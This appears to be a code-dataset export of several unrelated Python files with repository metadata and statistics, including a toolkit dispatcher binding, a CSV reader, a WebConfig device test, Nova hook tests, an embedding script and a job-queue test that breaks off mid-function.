| 38.142857 | 258 | 0.634831 | 105 | 1,068 | 6.333333 | 0.495238 | 0.108271 | 0.108271 | 0.126316 | 0.138346 | 0.138346 | 0 | 0 | 0 | 0 | 0 | 0.042579 | 0.230337 | 1,068 | 27 | 259 | 39.555556 | 0.766423 | 0.042135 | 0 | 0.380952 | 1 | 0 | 0.374143 | 0.065622 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.047619 | 0 | 0.190476 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b479dbf807c903d09638149ff0de16acee169e3 | 5,827 | py | Python | apis/python_interface_helpers/stk_env.py | davetrollope-fsml/sequence_toolkit | 49495f679aad1d7c134cf8a189cca1e8acc9f4bd | [
"MIT"
] | null | null | null | apis/python_interface_helpers/stk_env.py | davetrollope-fsml/sequence_toolkit | 49495f679aad1d7c134cf8a189cca1e8acc9f4bd | [
"MIT"
] | null | null | null | apis/python_interface_helpers/stk_env.py | davetrollope-fsml/sequence_toolkit | 49495f679aad1d7c134cf8a189cca1e8acc9f4bd | [
"MIT"
] | null | null | null | from stk_sequence import *
from stk_tcp_server import *
from stk_tcp_client import *
from stk_data_flow import *
from stk_options import stk_clear_cb
import time
class stk_callback:
def __init__(self):
self._caller = None
self._mapobj = None
pass
def add_callback_ref(self,caller):
self._caller = caller
def del_callback_ref(self,caller):
if self._caller:
self._caller.delCallback()
def add_callback_map_obj(self,mapobj):
self._mapobj = mapobj
def map_obj(self):
return self._mapobj
def close(self):
if self._caller:
self.del_callback_ref(self._caller)
self._caller = None
def caller(self):
return self._caller
def fd_created(self,df,fd):
pass
def fd_destroyed(self,df,fd):
pass
class stk_dispatcher_cb(stk_dispatch_cb_class):
def __init__(self,env,cbcls):
self.dispatchclass = stk_dispatch_cb_class.__init__(self)
self._cbcls = cbcls
self._env = env
def close(self):
#del self.dispatchclass
#self.dispatchclass = None
#del self.__class__.obj_map[stk_get_service_group_id(self._svcgrp)]
pass
def finddf(self,dfptr):
dfref = stk_ulong_df_to_df_ptr(dfptr)
df = stk_data_flow.find(dfptr)
if df == None:
dftype = stk_data_flow.type(dfptr)
if dftype == STK_TCP_ACCEPTED_FLOW or dftype == STK_TCP_SERVER_FLOW:
df = stk_tcp_server(self._env,None,None,None,dfref)
if dftype == STK_TCP_CLIENT_FLOW:
df = stk_tcp_client(self._env,None,None,None,dfref)
return df
def process_data(self,dfptr,seqptr):
seqref = stk_ulong_seq_to_seq_ptr(seqptr)
seq = stk_sequence.find(seqptr)
if seq == None:
seq = stk_sequence(self._env,None,None,0,0,None,seqref)
# the dfptr here is actually the C pointer converted to a ulong
df = self.finddf(dfptr)
self._cbcls.process_data(df,seq)
seq.unmap()
def process_name_response(self,dfptr,seqptr):
seqref = stk_ulong_seq_to_seq_ptr(seqptr)
seq = stk_sequence.find(seqptr)
if seq == None:
seq = stk_sequence(self._env,None,None,0,0,None,seqref)
# the dfptr here is actually the C pointer converted to a ulong
df = self.finddf(dfptr)
self._cbcls.process_name_response(df,seq)
seq.unmap()
pass
def process_monitoring_response(self,dfptr,seqptr):
pass
def fd_created(self,dfptr,fd):
# the dfptr here is actually the C pointer converted to a ulong
dfref = stk_ulong_df_to_df_ptr(dfptr)
df = stk_data_flow.find(dfptr)
if df == None:
# This sucks....
dftype = stk_data_flow.type(dfptr)
if dftype == STK_TCP_ACCEPTED_FLOW or dftype == STK_TCP_SERVER_FLOW:
df = stk_tcp_server(self._env,None,None,None,dfref)
# Err, UDP doesn't actually have connections so this really
# isn't likely to be needed - why would the app care about udp creations?
#elif dftype == STK_UDP_CLIENT_FLOW:
#df = stk_udp_client(self._env,None,None,None,dfref)
if df:
self._cbcls.fd_created(df,fd)
def fd_destroyed(self,dfptr,fd):
# the dfptr here is actually the C pointer converted to a ulong
dfref = stk_ulong_df_to_df_ptr(dfptr)
df = stk_data_flow.find(dfptr)
if df == None:
dftype = stk_data_flow.type(dfptr)
if dftype == STK_TCP_ACCEPTED_FLOW or dftype == STK_TCP_SERVER_FLOW:
df = stk_tcp_server(self._env,None,None,None,dfref)
if df:
self._cbcls.fd_destroyed(df,fd)
class stk_env:
def __init__(self,envopts):
self.caller = stk_dispatch_cb_caller()
envopts.append_dispatcher(self.caller.get_dispatcher())
self._opts = envopts
self._env = stk_create_env(envopts.ref())
self._dispatcher_stopped = False;
def close(self):
if self._env:
if self._opts:
stk_clear_cb(self._opts.ref(),"dispatcher")
if self.caller:
self.caller.detach_env(self._env)
stk_destroy_env(self._env)
if self.caller:
self.caller.close()
self.caller = None
self._env = None
def ref(self):
return self._env
def get_name_service(self):
return stk_env_get_name_service(self.ref())
def dispatch_timer_pools(self,interval):
stk_env_dispatch_timer_pools(self._env,interval)
def listening_dispatcher(self,df,svcgrp,appcb):
appcb.add_callback_ref(self.caller)
self._dispatcher_stopped = False
if self.caller.env_listening_dispatcher_add_fd(df.ref()) < 0:
return
while self._dispatcher_stopped == False:
self.caller.env_listening_dispatcher(df.ref(),stk_dispatcher_cb(self,appcb).__disown__(),200)
self.caller.env_listening_dispatcher_del_fd(df.ref())
def client_dispatcher_timed(self,appcb,timeout):
if appcb:
appcb.add_callback_ref(self.caller)
self.caller.env_client_dispatcher_timed(self._env,timeout,stk_dispatcher_cb(self,appcb).__disown__())
else:
self.caller.env_client_dispatcher_timed(self._env,timeout,None)
def stop_dispatcher(self):
self._dispatcher_stopped = True;
self.caller.env_stop_dispatching(self._env)
time.sleep(.2)
def terminate_dispatcher(self):
self.caller.env_terminate_dispatcher(self._env)
@classmethod
def append_name_server_dispatcher_cbs(cls,envopts,data_flow_group):
nsopts = envopts.find_option("name_server_options")
nsopts.update_ref(stk_append_name_server_fd_cbs(data_flow_group,nsopts.ref()))
@classmethod
def remove_name_server_dispatcher_cbs(cls,envopts,data_flow_group):
dfopts = envopts.find_option(data_flow_group + "_options")
if dfopts != None:
dfopts.remove_dispatcher_fd_cbs()
else:
envopts.remove_dispatcher_fd_cbs()
@classmethod
def append_monitoring_dispatcher_cbs(cls,envopts,data_flow_group):
envopts.update_ref(stk_append_monitoring_fd_cbs(data_flow_group,envopts.ref()))
@classmethod
def remove_monitoring_dispatcher_cbs(cls,envopts,data_flow_group):
dfopts = envopts.find_option(data_flow_group + "_options")
if dfopts != None:
dfopts.remove_dispatcher_fd_cbs()
@classmethod
def log(cls,level,message):
stk_log(level,message)
@classmethod
def debug(cls,component,message):
stk_debug(component,message)
| 34.276471 | 104 | 0.763686 | 913 | 5,827 | 4.529025 | 0.144578 | 0.062878 | 0.027086 | 0.025393 | 0.50399 | 0.440871 | 0.407013 | 0.390085 | 0.359129 | 0.32237 | 0 | 0.001781 | 0.13283 | 5,827 | 169 | 105 | 34.47929 | 0.816545 | 0.101596 | 0 | 0.411765 | 0 | 0 | 0.008617 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.20915 | false | 0.039216 | 0.039216 | 0.026144 | 0.30719 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b47c0ccbeb35e2ac408d98bd973b27910abd4c8 | 1,163 | py | Python | readfile.py | y-azvd/perceptron | 3cd4cefc7ae54bd8a3df702300ee9797389fef4a | [
"MIT"
] | null | null | null | readfile.py | y-azvd/perceptron | 3cd4cefc7ae54bd8a3df702300ee9797389fef4a | [
"MIT"
] | null | null | null | readfile.py | y-azvd/perceptron | 3cd4cefc7ae54bd8a3df702300ee9797389fef4a | [
"MIT"
] | null | null | null | import numpy as np
##
## @brief function_description
##
## @param filename The filename
##
## @return description_of_the_return_value
##
def readfile(filename):
csvfile = open(filename, "r")
if not csvfile:
print "error"
return -1
rows = []
for row in csvfile:
if row[0] != '#' : # linhas que comecam com # sao comentarios
row = row.strip() # removes white space around non white space
cols = row.split(',') # splits by any white space
cols = [(col.strip()) for col in cols if (col != '' or col != '\t')]
rows.append(cols)
csvfile.close()
return rows
##
## @brief Reads for perceptron.
##
## @param filename The filename
## @param dataType The data type
##
## @return description_of_the_return_value
##
def readForPerceptron(filename, dataType):
content = readfile(filename)
features = np.asarray(content, dtype=dataType)
# classifications for each feature entry/vector/array
# np.asarray modifies array on place.
featuresClassifications = np.array(features[:, -1])
# changes the classification for the bias entry to 1
features[:, -1] = 1
return features, featuresClassifications
| 23.26 | 71 | 0.674119 | 147 | 1,163 | 5.272109 | 0.503401 | 0.03871 | 0.04129 | 0.061935 | 0.092903 | 0.092903 | 0.092903 | 0 | 0 | 0 | 0 | 0.006501 | 0.206363 | 1,163 | 50 | 72 | 23.26 | 0.833153 | 0.436801 | 0 | 0 | 0 | 0 | 0.016181 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.047619 | null | null | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b5048a8c70006e924308165169ee5c4fabe48fa | 934 | py | Python | asar_pi_applications/asar_vision/robot_distance_incorrect.py | ssnover/msd-p18542 | 32bef466f9d5ba55429da2119a14081b3e411d0b | [
"MIT"
] | 3 | 2021-01-07T07:46:50.000Z | 2021-11-17T10:48:39.000Z | asar_pi_applications/asar_vision/robot_distance_incorrect.py | ssnover/msd-p18542 | 32bef466f9d5ba55429da2119a14081b3e411d0b | [
"MIT"
] | 3 | 2018-02-19T20:30:30.000Z | 2018-04-20T23:25:29.000Z | asar_pi_applications/asar_vision/robot_distance_incorrect.py | ssnover95/msd-p18542 | 32bef466f9d5ba55429da2119a14081b3e411d0b | [
"MIT"
] | 1 | 2021-01-07T07:46:52.000Z | 2021-01-07T07:46:52.000Z | import numpy as np
from math import sqrt
def robot_distance_incorrect(robot_actual_location, hexagon_pixel_values):
distance_to_get_back = []
distances = []
pixel_distance = []
for i in range(0, len(hexagon_pixel_values)):
dist = sqrt((robot_actual_location[0] - hexagon_pixel_values[i][0]) ** 2 +
(robot_actual_location[1] - hexagon_pixel_values[i][1]) ** 2)
distances += [dist]
index_min = np.argmin(distances)
correct_position = hexagon_pixel_values[index_min]
# find the distance that needs to be traveled to get to the correct location
pixel_distance = (correct_position[0] - robot_actual_location[0], correct_position[1]-robot_actual_location[1])
# print(correct_position, robot_actual_location, pixel_distance)
# convert to actual distance
distance_to_get_back = (pixel_distance[0]/1.79, pixel_distance[1]/1.749)
return distance_to_get_back
| 44.47619 | 115 | 0.723769 | 131 | 934 | 4.824427 | 0.343511 | 0.10443 | 0.18038 | 0.080696 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026144 | 0.180942 | 934 | 20 | 116 | 46.7 | 0.8 | 0.175589 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.133333 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b5a82c329031fc6f172ed423012d36ab20bca44 | 10,817 | py | Python | testscripts/RDKB/component/WEBCONFIG/TS_WEBCONFIG_DisableRFC_QuerySyncParams.py | rdkcmf/rdkb-tools-tdkb | 9f9c3600cd701d5fc90ac86a6394ebd28d49267e | [
"Apache-2.0"
] | null | null | null | testscripts/RDKB/component/WEBCONFIG/TS_WEBCONFIG_DisableRFC_QuerySyncParams.py | rdkcmf/rdkb-tools-tdkb | 9f9c3600cd701d5fc90ac86a6394ebd28d49267e | [
"Apache-2.0"
] | null | null | null | testscripts/RDKB/component/WEBCONFIG/TS_WEBCONFIG_DisableRFC_QuerySyncParams.py | rdkcmf/rdkb-tools-tdkb | 9f9c3600cd701d5fc90ac86a6394ebd28d49267e | [
"Apache-2.0"
] | null | null | null | ##########################################################################
# If not stated otherwise in this file or this component's Licenses.txt
# file the following copyright and licenses apply:
#
# Copyright 2021 RDK Management
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
'''
<?xml version="1.0" encoding="UTF-8"?><xml>
<id/>
<version>1</version>
<name>TS_WEBCONFIG_DisableRFC_QuerySyncParams</name>
<primitive_test_id/>
<primitive_test_name>Webconfig_DoNothing</primitive_test_name>
<primitive_test_version>1</primitive_test_version>
<status>FREE</status>
<synopsis>To disable the Webconfig RFC and check if a get operation on Force Sync parameters logs DB failure in WebConfig.log file</synopsis>
<groups_id/>
<execution_time>10</execution_time>
<long_duration>false</long_duration>
<advanced_script>false</advanced_script>
<remarks/>
<skip>false</skip>
<box_types>
<box_type>Broadband</box_type>
</box_types>
<rdk_versions>
<rdk_version>RDKB</rdk_version>
</rdk_versions>
<test_cases>
<test_case_id>TC_WEBCONFIG_02</test_case_id>
<test_objective>This test is case is to disable the RFC and check if a get operation on Force Sync parameters logs DB failure in WebConfig.log file</test_objective>
<test_type>Positive</test_type>
<test_setup>Broadband</test_setup>
<pre_requisite>1.Ccsp Components in DUT should be in a running state that includes component under test Cable Modem
2.TDK Agent should be in running state or invoke it through StartTdk.sh script
3.Webconfig distro should be enabled else enable with custom image</pre_requisite>
<api_or_interface_used>pam_GetParameterValues
pam_SetParameterValues</api_or_interface_used>
<input_parameters>Device.X_RDK_WebConfig.RfcEnable
Device.X_RDK_WebConfig.ConfigFile.1.ForceSyncCheck
Device.X_RDK_WebConfig.ConfigFile.1.SyncCheckOK"</input_parameters>
<automation_approch>1.Load the module
2.Get the current webconfig RFC enable status and disable the RFC
3.Do a get operation on Force Sync check and Force Sync Check Ok parameters
4.Check if DB failed message specific to the parameter is logged in WebConfig.log File
5.Revert the RFC status to previous
6.Unload the module</automation_approch>
<expected_output>When webconfig RFC is disabled and get operation done on Force Sync parameters should log Db failed message specific to the parameter in webConfig.log file</expected_output>
<priority>High</priority>
<test_stub_interface>WEBCONFIG</test_stub_interface>
<test_script>TS_WEBCONFIG_DisableRFC_QuerySyncParams</test_script>
<skipped>No</skipped>
<release_version>M86</release_version>
<remarks>None</remarks>
</test_cases>
</xml>
'''
# use tdklib library,which provides a wrapper for tdk testcase script
import tdklib;
from tdkbVariables import *;
import tdkutility
from tdkutility import *
from time import sleep;
#Test component to be tested
sysobj = tdklib.TDKScriptingLibrary("sysutil","1");
pamobj = tdklib.TDKScriptingLibrary("pam","1");
#IP and Port of box, No need to change,
#This will be replaced with correspoing Box Ip and port while executing script
ip = <ipaddress>
port = <port>
pamobj.configureTestCase(ip,port,'TS_WEBCONFIG_DisableRFC_QuerySyncParams');
sysobj.configureTestCase(ip,port,'TS_WEBCONFIG_DisableRFC_QuerySyncParams');
#Get the result of connection with test component and DUT
pamloadmodulestatus =pamobj.getLoadModuleResult();
sysloadmodulestatus =sysobj.getLoadModuleResult();
print "[LIB LOAD STATUS] : %s" %pamloadmodulestatus ;
print "[LIB LOAD STATUS] : %s" %sysloadmodulestatus ;
revert = 0;
if "SUCCESS" in pamloadmodulestatus.upper() and "SUCCESS" in sysloadmodulestatus.upper():
#Set the result status of execution
pamobj.setLoadModuleStatus("SUCCESS");
sysobj.setLoadModuleStatus("SUCCESS");
tdkTestObj = pamobj.createTestStep('pam_GetParameterValues');
tdkTestObj.addParameter("ParamName","Device.X_RDK_WebConfig.RfcEnable");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase("expectedresult");
actualresult = tdkTestObj.getResult();
initial_value = tdkTestObj.getResultDetails().strip();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 1: Get current value of Web Config Enable"
print "EXPECTED RESULT 1: Should get current value of Web Config Enable"
print "ACTUAL RESULT 1: current value is %s" %initial_value;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
tdkTestObj = pamobj.createTestStep('pam_SetParameterValues');
tdkTestObj.addParameter("ParamName","Device.X_RDK_WebConfig.RfcEnable");
tdkTestObj.addParameter("ParamValue","false");
tdkTestObj.addParameter("Type","boolean");
expectedresult="SUCCESS";
#Execute testcase on DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
result = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
revert =1;
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 2: Set Web Config Enable status to false";
print "EXPECTED RESULT 2: Should set Web Config Enable status to false";
print "ACTUAL RESULT 2: %s" %result;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
paramlist = ["Device.X_RDK_WebConfig.ConfigFile.1.ForceSyncCheck","Device.X_RDK_WebConfig.ConfigFile.1.SyncCheckOK"];
logMsgs = ["ForceSyncCheck GET from DB failed","SyncCheckOK GET from DB failed"];
i=0;
for item in paramlist:
tdkTestObj = pamobj.createTestStep('pam_GetParameterValues');
tdkTestObj.addParameter("ParamName",item);
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase("expectedresult");
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip();
if expectedresult in actualresult:
print "Querying %s parameter is sucessfull" %item;
print "Check if DB failed message is seen on querying this specific parameter";
sleep(5);
tdkTestObj = sysobj.createTestStep('ExecuteCmd');
expectedresult="SUCCESS";
cmd= "cat /rdklogs/logs/WebConfig.log | grep -rn \"%s\" " %logMsgs[i];
print cmd;
expectedresult="SUCCESS";
tdkTestObj.addParameter("command", cmd);
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n", "");
i= i+1;
if expectedresult in actualresult and details:
tdkTestObj.setResultStatus("SUCCESS");
print"%s" %details;
print"The expected log message is present when Queried";
print "[TEST EXECUTION RESULT] : SUCCESS";
else:
tdkTestObj.setResultStatus("FAILURE");
print "The expected log message is not present: %s" %logMsgs[i];
print "[TEST EXECUTION RESULT] : FAILURE";
break;
else:
revert =0;
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 2: Set Web Config Enable status to false";
print "EXPECTED RESULT 2: Should set Web Config Enable status to false";
print "ACTUAL RESULT 2: %s" %result;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
if revert ==1 :
tdkTestObj = pamobj.createTestStep('pam_SetParameterValues');
tdkTestObj.addParameter("ParamName","Device.X_RDK_WebConfig.RfcEnable");
tdkTestObj.addParameter("ParamValue",initial_value);
tdkTestObj.addParameter("Type","boolean");
expectedresult="SUCCESS";
#Execute testcase on DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
result = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 3: Revert the Web Config Enable status to previous"
print "EXPECTED RESULT 3: Should revert Web Config status to previous"
print "ACTUAL RESULT 3: %s" %result;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS"
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 3: Revert Web Config Enable status to previous"
print "EXPECTED RESULT 3: Should revert Web Config Enable status to previous"
print "ACTUAL RESULT 3: %s" %result;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE"
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 1: Get current value of Web Config Enable"
print "EXPECTED RESULT 1: Should get current value of Web Config Enable"
print "ACTUAL RESULT 1: current value is %s" %initial_value;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
pamobj.unloadModule("pam");
sysobj.unloadModule("sysutil");
else:
print "Failed to load pam/sysutil module";
pamobj.setLoadModuleStatus("FAILURE");
sysobj.setLoadModuleStatus("FAILURE");
print "Module loading failed";
| 49.168182 | 194 | 0.665249 | 1,223 | 10,817 | 5.802126 | 0.224039 | 0.017756 | 0.023253 | 0.021421 | 0.517193 | 0.497322 | 0.477029 | 0.441375 | 0.412627 | 0.412627 | 0 | 0.007152 | 0.237312 | 10,817 | 219 | 195 | 49.392694 | 0.85297 | 0.132569 | 0 | 0.545455 | 0 | 0 | 0.321994 | 0.057092 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.041322 | null | null | 0.297521 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b61d6924578e04d8bbfa01176c73eece0bd32ef | 2,484 | py | Python | nova/tests/test_hooks.py | bopopescu/zknova | 8dd09199f5678697be228ffceeaf2c16f6d7319d | [
"Apache-2.0"
] | null | null | null | nova/tests/test_hooks.py | bopopescu/zknova | 8dd09199f5678697be228ffceeaf2c16f6d7319d | [
"Apache-2.0"
] | null | null | null | nova/tests/test_hooks.py | bopopescu/zknova | 8dd09199f5678697be228ffceeaf2c16f6d7319d | [
"Apache-2.0"
] | 1 | 2020-07-24T08:25:25.000Z | 2020-07-24T08:25:25.000Z | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2012 OpenStack, LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for hook customization."""
import stevedore
from nova import hooks
from nova import test
class SampleHookA(object):
name = "a"
def _add_called(self, op, kwargs):
called = kwargs.get('called', None)
if called is not None:
called.append(op + self.name)
def pre(self, *args, **kwargs):
self._add_called("pre", kwargs)
class SampleHookB(SampleHookA):
name = "b"
def post(self, rv, *args, **kwargs):
self._add_called("post", kwargs)
class MockEntryPoint(object):
def __init__(self, cls):
self.cls = cls
def load(self):
return self.cls
class HookTestCase(test.TestCase):
def _mock_load_plugins(self, iload, iargs, ikwargs):
return [
stevedore.extension.Extension('test_hook',
MockEntryPoint(SampleHookA), SampleHookA, SampleHookA()),
stevedore.extension.Extension('test_hook',
MockEntryPoint(SampleHookB), SampleHookB, SampleHookB()),
]
def setUp(self):
super(HookTestCase, self).setUp()
hooks.reset()
self.stubs.Set(stevedore.extension.ExtensionManager, '_load_plugins',
self._mock_load_plugins)
@hooks.add_hook('test_hook')
def _hooked(self, a, b=1, c=2, called=None):
return 42
def test_basic(self):
self.assertEqual(42, self._hooked(1))
mgr = hooks._HOOKS['test_hook']
self.assertEqual(2, len(mgr.extensions))
self.assertEqual(SampleHookA, mgr.extensions[0].plugin)
self.assertEqual(SampleHookB, mgr.extensions[1].plugin)
def test_order_of_execution(self):
called_order = []
self._hooked(42, called=called_order)
self.assertEqual(['prea', 'preb', 'postb'], called_order)
| 28.227273 | 78 | 0.654187 | 308 | 2,484 | 5.165584 | 0.435065 | 0.037712 | 0.016342 | 0.020113 | 0.090509 | 0.061596 | 0 | 0 | 0 | 0 | 0 | 0.012137 | 0.237118 | 2,484 | 87 | 79 | 28.551724 | 0.827441 | 0.272947 | 0 | 0.043478 | 0 | 0 | 0.043113 | 0 | 0 | 0 | 0 | 0 | 0.108696 | 1 | 0.217391 | false | 0 | 0.065217 | 0.065217 | 0.478261 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b649e46fb5914bfe7b320bbcd19fe8e80f42ef7 | 1,624 | py | Python | code_trunk/emb.py | chris4540/DD2430-ds-proj | b876efabe949392b27a7ebd4afb2be623174e287 | [
"MIT"
] | null | null | null | code_trunk/emb.py | chris4540/DD2430-ds-proj | b876efabe949392b27a7ebd4afb2be623174e287 | [
"MIT"
] | null | null | null | code_trunk/emb.py | chris4540/DD2430-ds-proj | b876efabe949392b27a7ebd4afb2be623174e287 | [
"MIT"
] | null | null | null | import torch
from network.siamese import SiameseNet
from network.resnet import ResidualEmbNetwork
import os
import numpy as np
from utils.datasets import DeepFashionDataset
from torchvision.transforms import Compose
from torchvision.transforms import Resize
from torchvision.transforms import ToTensor
from torchvision.transforms import Normalize
from torch.utils.data import Subset
from torch.utils.data import DataLoader
from utils import extract_embeddings
import pickle
from cuml.manifold import TSNE
emb_net = ResidualEmbNetwork()
model = SiameseNet(emb_net)
trans = Compose(
[
Resize((224, 224)),
ToTensor(),
Normalize([0.7511, 0.7189, 0.7069], [0.2554, 0.2679, 0.2715]),
])
model.load_state_dict(torch.load('siamese_resnet18.pth'))
deep_fashion_root_dir = "./deepfashion_data"
train_ds = DeepFashionDataset(
deep_fashion_root_dir, 'train', transform=trans)
emb_net = model.emb_net
emb_net.cuda()
# subset
n_samples = 25000
sel_idx = np.random.choice(
list(range(len(train_ds))),
n_samples, replace=False)
assert len(set(sel_idx)) == n_samples
ds = Subset(train_ds, sel_idx)
loader = DataLoader(
ds, batch_size=100, pin_memory=True, num_workers=os.cpu_count())
print("extracting...")
embeddings, labels = extract_embeddings(emb_net, loader)
tsne = TSNE(n_iter=400, metric="euclidean")
projected_emb = tsne.fit_transform(embeddings)
with open('projected_emb.pkl', 'wb') as handle:
pickle.dump(projected_emb, handle, protocol=pickle.HIGHEST_PROTOCOL)
with open('labels.pkl', 'wb') as handle:
pickle.dump(labels, handle, protocol=pickle.HIGHEST_PROTOCOL)
| 28.491228 | 72 | 0.76601 | 225 | 1,624 | 5.36 | 0.435556 | 0.029851 | 0.082919 | 0.102819 | 0.135987 | 0.038143 | 0 | 0 | 0 | 0 | 0 | 0.034629 | 0.128695 | 1,624 | 56 | 73 | 29 | 0.817668 | 0.003695 | 0 | 0 | 0 | 0 | 0.059406 | 0 | 0 | 0 | 0 | 0 | 0.022222 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0.022222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
0b6a970c6ea0942a3a8927c5faff7c9dff07c309 | 4,096 | py | Python | tests/testJobQueue.py | hartloff/Tango | 9dd867a596441e0e2ba1069017781dddb9c79bdb | [
"Apache-2.0"
] | 2 | 2020-10-30T03:01:55.000Z | 2021-03-25T03:18:12.000Z | tests/testJobQueue.py | hartloff/Tango | 9dd867a596441e0e2ba1069017781dddb9c79bdb | [
"Apache-2.0"
] | 7 | 2018-06-26T02:48:09.000Z | 2021-01-21T03:12:19.000Z | tests/testJobQueue.py | hartloff/Tango | 9dd867a596441e0e2ba1069017781dddb9c79bdb | [
"Apache-2.0"
] | 9 | 2018-09-28T23:48:48.000Z | 2021-10-03T20:29:48.000Z | import unittest
import redis
from jobQueue import JobQueue
from tangoObjects import TangoIntValue, TangoJob
from config import Config
class TestJobQueue(unittest.TestCase):
def setUp(self):
if Config.USE_REDIS:
__db = redis.StrictRedis(
Config.REDIS_HOSTNAME, Config.REDIS_PORT, db=0)
__db.flushall()
self.job1 = TangoJob(
name="sample_job_1",
vm="ilter.img",
outputFile="sample_job_1_output",
input=[],
timeout=30,
notifyURL="notifyMeUrl",
maxOutputFileSize=4096)
self.job2 = TangoJob(
name="sample_job_2",
vm="ilter.img",
outputFile="sample_job_2_output",
input=[],
timeout=30,
notifyURL="notifyMeUrl",
maxOutputFileSize=4096)
self.jobQueue = JobQueue(None)
self.jobQueue.reset()
self.jobId1 = self.jobQueue.add(self.job1)
self.jobId2 = self.jobQueue.add(self.job2)
def test_sharedInt(self):
if Config.USE_REDIS:
num1 = TangoIntValue("nextID", 1000)
num2 = TangoIntValue("nextID", 3000)
self.assertEqual(num1.get(), 1000)
self.assertEqual(num1.get(), num2.get())
else:
return
def test_job(self):
self.job1.makeUnassigned()
self.assertTrue(self.job1.isNotAssigned())
job = self.jobQueue.get(self.jobId1)
self.assertTrue(job.isNotAssigned())
self.job1.makeAssigned()
print "Checkout:"
self.assertFalse(self.job1.isNotAssigned())
self.assertFalse(job.isNotAssigned())
def test_add(self):
info = self.jobQueue.getInfo()
